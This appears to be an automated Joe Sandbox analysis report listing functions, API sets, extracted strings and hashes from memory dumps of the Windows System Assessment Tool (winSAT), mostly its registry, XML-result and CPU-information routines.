                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$Close$EnabledEventHandleOpenValue__uncaught_exception$ConsoleCountCtrlCurrentDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexProcessQueryReleaseRemoveSizeofStringTickTypeUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: failed COM initialization.$PrivateError2
                                                                                                                                                                                              • API String ID: 3454319971-4149571460
                                                                                                                                                                                              • Opcode ID: 66ba158f75fdcabadefced5ca330610669cdb5061b7cefa180dc003ad55f290a
                                                                                                                                                                                              • Instruction ID: d6800aeee99ef5e1aa196bda9764b3c62cd9b76ff1ceafaa11e568d1bff3a92f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 66ba158f75fdcabadefced5ca330610669cdb5061b7cefa180dc003ad55f290a
                                                                                                                                                                                              • Instruction Fuzzy Hash: B30242A2E0D68795EB20FB15F8502F9B761FF81344FF09035D68E466A9DEACE544CB20
                                                                                                                                                                                              Function 00007FF780F9EEFA Relevance: 80.8, APIs: 43, Strings: 3, Instructions: 322synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$Close$HandleOpenValue__uncaught_exception$ConsoleCtrlDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexQueryReleaseRemoveSizeofStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2
                                                                                                                                                                                              • API String ID: 2704613218-3112339584
                                                                                                                                                                                              • Opcode ID: d50f20121fb31ee67c88ed2c436104bc84e55e6352d75d4033a5949564b9b30d
                                                                                                                                                                                              • Instruction ID: 339095e43d69ccd325696dbbef76d46f495b8930ca2a71142c0904c4d993fb88
                                                                                                                                                                                              • Opcode Fuzzy Hash: d50f20121fb31ee67c88ed2c436104bc84e55e6352d75d4033a5949564b9b30d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 890233A2E0D68795EB20FB15F8502F9B761FF81344FF09035D64E466A9EEACE544CB20
                                                                                                                                                                                              Function 00007FF780F9F0A1 Relevance: 79.1, APIs: 41, Strings: 4, Instructions: 330synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Close$CriticalEnabledEventOpenSectionValue__uncaught_exception$ConsoleCountCtrlCurrentDirectoryEnterErrorFreeHandleHandlerLastLeaveLibraryMutexProcessQueryReleaseRemoveStringTickTypeUninitialize_snprintf_s_vsnprintf_svswprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: cannot init winsat registry entries: %S$PrivateError2
                                                                                                                                                                                              • API String ID: 1689163717-156494882
                                                                                                                                                                                              • Opcode ID: c1decf6e8d2d075f29237eeba2c82e8f8b5f6313aeef326320beda2a4aea7bf2
                                                                                                                                                                                              • Instruction ID: 6dafa6c29603d3f17a68c8f82d153763e642d127a7603775712607bd630ac1fd
                                                                                                                                                                                              • Opcode Fuzzy Hash: c1decf6e8d2d075f29237eeba2c82e8f8b5f6313aeef326320beda2a4aea7bf2
                                                                                                                                                                                              • Instruction Fuzzy Hash: A30232A2E0D68795EB20FB15F8502F9B761FF81344FF09035D68E466A9DEACE544CB20
                                                                                                                                                                                              Function 00007FF780F9F39E Relevance: 75.6, APIs: 39, Strings: 4, Instructions: 312synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$Close$EnabledEventHandleOpenValue__uncaught_exception$ConsoleCountCtrlCurrentDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexProcessQueryReleaseRemoveSizeofStringTickTypeUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: can't run formal assessment on OS's earlier than Vista$PrivateError2
                                                                                                                                                                                              • API String ID: 3454319971-2583355072
                                                                                                                                                                                              • Opcode ID: 3f72cb5f6059ca35f14ee73fc11479144fea23cbd3e81fae8a20b6e1e1c5a509
                                                                                                                                                                                              • Instruction ID: 8ed61db9deab5a6bfbc60a0ff608f7a3d71f0acda840ed9b90ee97f0bc0fc12b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f72cb5f6059ca35f14ee73fc11479144fea23cbd3e81fae8a20b6e1e1c5a509
                                                                                                                                                                                              • Instruction Fuzzy Hash: E0F141A2E0D68795EB20FB15F8506F9B761FF81344FF09035C68E466A9DEACE544CB20
                                                                                                                                                                                              Function 00007FF780F9F537 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 299synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$Close$EnabledEventHandleOpenValue__uncaught_exception$ConsoleCountCtrlCurrentDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexProcessQueryReleaseRemoveSizeofStringTickTypeUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: User required this run be on bateries, but the machine is not currently on batteries.$PrivateError2
                                                                                                                                                                                              • API String ID: 3454319971-3742619606
                                                                                                                                                                                              • Opcode ID: 2fcaf5b6b79b07b458cdb4d08fbdf5e80bd48769116e5b98a6b09626dc88a80a
                                                                                                                                                                                              • Instruction ID: ef6cc9f5e5b0cde04d56b8f6807531a59c4ff9b85500708ba5d436388b5dc1ee
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fcaf5b6b79b07b458cdb4d08fbdf5e80bd48769116e5b98a6b09626dc88a80a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AF13FA2E0D68795EB20FB15F8506F9A761FF81344FF09035C68E466A9DEACE544CB20
                                                                                                                                                                                              Function 00007FF780FCB07C Relevance: 60.0, APIs: 22, Strings: 12, Instructions: 467libraryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CurrentErrorLastThread$ExceptionThrow$PerformancePriorityProcessQuery$CounterResource$Class$AffinityInfoLibraryLoadMaskSystem__uncaught_exception$FindFreeFrequencyHandleLockModuleNativeSizeofSleepVersionWow64
                                                                                                                                                                                              • String ID: $ num LPI's = $ Bytes, $ struct size = $>> Logical Processor Info: allocating $Cannot get processor, cpu and p-thread count information$ERROR: Can't get logical processor information$ERROR: No Cache information found on this machine$Gather CPU information$Information: GetLogicalProcessorInformation() not supported on this OS$Kernel32.dll$base\winsat\exe\keyinfo.cpp
                                                                                                                                                                                              • API String ID: 2296211545-1543135691
                                                                                                                                                                                              • Opcode ID: f8249fca2709a992bed8ef6b5726e944113895ba78c25a6cca67e9f3a052cce5
                                                                                                                                                                                              • Instruction ID: aa390e02e217273192cc1464195efbd4606953a2a22e6afead32b2dd9e8e24aa
                                                                                                                                                                                              • Opcode Fuzzy Hash: f8249fca2709a992bed8ef6b5726e944113895ba78c25a6cca67e9f3a052cce5
                                                                                                                                                                                              • Instruction Fuzzy Hash: B522CF36A0D6828AEB58EB25E4502B9F7A0FF88754FA48135DA4E43395DF3CF515CB20
                                                                                                                                                                                              Function 00007FF780FCA818 Relevance: 49.9, APIs: 4, Strings: 29, Instructions: 403COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$EnabledEvent$CountCurrentFormatFreeLocalMessageProcessTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: <Message>$ <Hresult>$ </Error>$ <Error>$ </ErrorsAndWarnings>$ <ErrorsAndWarnings>$</AssessmentResult>$</Hresult>$</Message>$<?xml version="1.0" encoding="UTF-8" standalone="yes"?>$<AssessmentResult>$AxeErrorXML: Error creating results.xml file.$Can't write error message '%s' to the registry$Can't write last exit code %u to the registry$Cannot open registry value %s$Cannot open winsat registry key$Cannot read registry value %s$Cannot write registry value %s$ERROR: failed to save can't and why error mesages to the registry$LastExitCode$LastExitCodeCantMsg$LastExitCodeWhyMsg$SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT$Skipping writing the exit code, cant msg and why msg to registry$Unspecified error %u occured.$Writing exit code, cant msg and why msg to registry $base\winsat\exe\processwinsaterror.cpp$results.xml$w, ccs=UTF-8
                                                                                                                                                                                              • API String ID: 3131830483-4286113941
                                                                                                                                                                                              • Opcode ID: 1d27e5cefef83b4c34150f632b323335ac420d5959c03e3140686ee4a7266146
                                                                                                                                                                                              • Instruction ID: 340079989d89b07db99972c1ac93a6819d53e5b0308ae5c8da6b10a03a498ba6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d27e5cefef83b4c34150f632b323335ac420d5959c03e3140686ee4a7266146
                                                                                                                                                                                              • Instruction Fuzzy Hash: BE125E21A0D99291FA60BB11E4523FAE360FF81718FE48431D68D46BDADE7CF946C721
                                                                                                                                                                                              Function 00007FF780FC5D0C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 200COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _wfopen_sfclosefwprintf
                                                                                                                                                                                              • String ID: $ $%s<%s>%s$%s</%s>%s$<?xml version="1.0" encoding="UTF-8" standalone="yes"?>$AssessmentResult$Iteration$Iterations$MetricValues$WriteXML: Error creating results.xml file.$base\winsat\exe\processresults.cpp$results.xml$w, ccs=UTF-8
                                                                                                                                                                                              • API String ID: 780330039-3305659412
                                                                                                                                                                                              • Opcode ID: 8f9e687c73d17732df1087ce298f28d15e5a62508bc0d1aa4bd31c9d41cbb5fe
                                                                                                                                                                                              • Instruction ID: 911bd39766d3ca9010a902ef9f6efdd96876d4e80c0a7bf671a126756ec614a5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f9e687c73d17732df1087ce298f28d15e5a62508bc0d1aa4bd31c9d41cbb5fe
                                                                                                                                                                                              • Instruction Fuzzy Hash: 80916D31A08B46CAE710AF61EC001E9B7A4FB49BA9BE48132DD4D53768CF7CE119C760
                                                                                                                                                                                              Function 00007FF780F93600 Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 164registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$ErrorLastResource$CloseFindLoadLockSizeofmemcpy
                                                                                                                                                                                              • String ID: cannot find the resource$cannot get the resource size$cannot load the resource$cannot lock the resource$resource size is an odd number of bytes$resource size is too small$target string too small to load resource
                                                                                                                                                                                              • API String ID: 3769284822-3195936322
                                                                                                                                                                                              • Opcode ID: 49e23884a8c8906a832e33a07cacf1d3dbc96e292207270a56eb59ab5c103da9
                                                                                                                                                                                              • Instruction ID: d99ce7c8d9cb2e34bd7fdcc7e7b546bab4d14a4568f9cdf71210cb668e7b00b2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 49e23884a8c8906a832e33a07cacf1d3dbc96e292207270a56eb59ab5c103da9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 02614C66A08A46C2EB10EB15E8511B9F770FB88B44FF48132DA8E437A5DF7CE549C760
                                                                                                                                                                                              Function 00007FF780F94100 Relevance: 40.5, APIs: 18, Strings: 5, Instructions: 264threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Current$Process$Priority$Class$ErrorLastThread$DuplicateExceptionHandleThrow
                                                                                                                                                                                              • String ID: Adjusted the priority to %d$Internal error - Failed to copy completion handle.$Internal error - NumThreads zero in MPOperation initialization$Operation started successfully.$base\winsat\exe\WinSATOp.h
                                                                                                                                                                                              • API String ID: 3426075690-1914989635
                                                                                                                                                                                              • Opcode ID: f32b8359e69ade68c59c5265cb0d50b0d6c9a14307cab65080c293da5173ebbe
                                                                                                                                                                                              • Instruction ID: 57a9b47fc8bdcc5127383a2e17ed950625bbda41aaa1b9f0990efc05d48e4fed
                                                                                                                                                                                              • Opcode Fuzzy Hash: f32b8359e69ade68c59c5265cb0d50b0d6c9a14307cab65080c293da5173ebbe
                                                                                                                                                                                              • Instruction Fuzzy Hash: B5C19F22A1C64286EB10EF15E8086BAFBA0FB95B94FE19131DA4E43395DF7CF444C720
                                                                                                                                                                                              Function 00007FF780FD5424 Relevance: 36.8, APIs: 16, Strings: 5, Instructions: 80timesynchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process$CloseCurrentHandle$CancelTerminateTimerWaitable$CriticalEventSection$EnabledEnterErrorLastLeaveObjectSingleThreadWait_vsnwprintf_s
                                                                                                                                                                                              • String ID: Cannot not wait for the watch dog thread to terminate$The wait for the watch dog thread termination timed out$The wait for the watch dog thread termination was abandoned$Watch dog system shutdown$base\winsat\exe\watchdog.cpp
                                                                                                                                                                                              • API String ID: 2085129634-3792182877
                                                                                                                                                                                              • Opcode ID: 5408dc39c9a0b837aa941d68a6d17d4b76736db89ef8761474aac419f26c5cde
                                                                                                                                                                                              • Instruction ID: c249523e6f17a67d00598773433bc6bcf723aa6d950adc538349ffba6a66a499
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5408dc39c9a0b837aa941d68a6d17d4b76736db89ef8761474aac419f26c5cde
                                                                                                                                                                                              • Instruction Fuzzy Hash: 18419E35918A42C6E740BB50FC542B9FB60FB89B66FF59131C90E423A4DFBCA449CB21
                                                                                                                                                                                              Function 00007FF780FC5604 Relevance: 34.9, APIs: 7, Strings: 16, Instructions: 420COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                              • String ID: ']/../../Disk$']/../ETWData/Throughput$/WinSAT/DiskAssessment/PerDiskData/Zone/ModeFlags[@friendlyName='$> Wrote random read disk score, from the profiler, to the registry %u$> Wrote wsswap interference, from the profiler, to the registry %u$> Wrote wsswap throughput, from the profiler, to the registry %u$Can't find disk random read scores in XML output$Disk%sRandomReadThroughput$ERROR: Can't write random read disk score, from the profiler, to the registry %u: %s$ERROR: Can't write wsswap interference, from the profiler, to the registry %u: %s$ERROR: Can't write wsswap throughput, from the profiler, to the registry %u: %s$INFO: Can't find disk random read scores in XML output$Skipping Registry Entry for random read disk score$WsSwapInterference$WsSwapResult$base\winsat\exe\processresults.cpp
                                                                                                                                                                                              • API String ID: 1452528299-1586673344
                                                                                                                                                                                              • Opcode ID: b14174dc32bd13f3af668c700c4d73f7d4ecdb0387bf3061769f343c3269865f
                                                                                                                                                                                              • Instruction ID: c5911286beba1d5a7f16b9382879ddd00a8894d523ada47378d68e7a53a0b8c7
                                                                                                                                                                                              • Opcode Fuzzy Hash: b14174dc32bd13f3af668c700c4d73f7d4ecdb0387bf3061769f343c3269865f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 90127D22A1CA4291EB10FB61E8410F9A7A0FF91758FE09532EA4D43BE5DF7CE945C760
                                                                                                                                                                                              Function 00007FF780FB3E58 Relevance: 31.7, APIs: 4, Strings: 14, Instructions: 179libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: Appliance PC$Desktop$Enterprise Server$IsMobile$Mobile$Performance Server$Platform$PlatformRole$PowerDeterminePlatformRole$SOHO Server$Unknown$Workstation$desc$powrprof.dll
                                                                                                                                                                                              • API String ID: 1866314245-818624304
                                                                                                                                                                                              • Opcode ID: bd033654b7d33f161b6ed6f31cd3d1b550a555180a03c82eb54501a19c4e26ee
                                                                                                                                                                                              • Instruction ID: be2d93d5e00c16dcfb5b86f2410d60b510572ac60c7561c5e04c3b5c1b823d68
                                                                                                                                                                                              • Opcode Fuzzy Hash: bd033654b7d33f161b6ed6f31cd3d1b550a555180a03c82eb54501a19c4e26ee
                                                                                                                                                                                              • Instruction Fuzzy Hash: 06716221A4DA0395EB04BB25D8510F8B760BF45394BE0A132E50E477E9EFBCF949C760
                                                                                                                                                                                              Function 00007FF780FDCDB8 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 203fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Handle$ConsoleCreateErrorFileInformationLastOutput
                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                              • API String ID: 3315080193-3130406586
                                                                                                                                                                                              • Opcode ID: e14196b2af8bac616a4872e76dc213d5823adbce388028b3a99f750f0180f2ab
                                                                                                                                                                                              • Instruction ID: 85a74f63ab5352ecd65863a122748accec8442d77c033781aeb52a0d607d8206
                                                                                                                                                                                              • Opcode Fuzzy Hash: e14196b2af8bac616a4872e76dc213d5823adbce388028b3a99f750f0180f2ab
                                                                                                                                                                                              • Instruction Fuzzy Hash: A3917022A0C64782EF00BF15E854278AB61FF81BA4FA49235DA6D177E8DF7CE405C720
                                                                                                                                                                                              Function 00007FF780FAB16C Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 291COMMON
                                                                                                                                                                                              Download Yara Rule
